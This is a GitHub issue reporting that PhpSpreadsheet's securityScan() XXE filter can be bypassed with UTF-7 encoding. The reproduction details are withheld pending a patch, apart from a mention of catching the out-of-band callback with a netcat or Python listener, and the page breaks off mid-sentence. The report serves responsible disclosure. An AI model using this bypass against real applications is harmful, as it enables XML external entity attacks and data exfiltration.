Join GitHub today
GitHub is home to over 28 million developers working together to host and review code, manage projects, and build software together.Sign up
XXE Injection - Security scan bypass #771
What is the expected behavior?
The securityScan() function is used to prevent XXE attacks.
What is the current behavior?
The securityScan() function can be bypassed by using UTF-7 encoding.
What are the steps to reproduce?
/Details suppressed until after patch was released/
Replace the IP address and port
Set up a listener either with Python, netcat, etc. locally and watch for a request that will be made once the xlsx is read by the library.
Please let me know if you would like more details on generating the xlsx file or if you need any clarification about the issue.
Which versions of PhpSpreadsheet and PHP are affected?
I believe it affects all versions.
Would it be possible for the
Looking more closely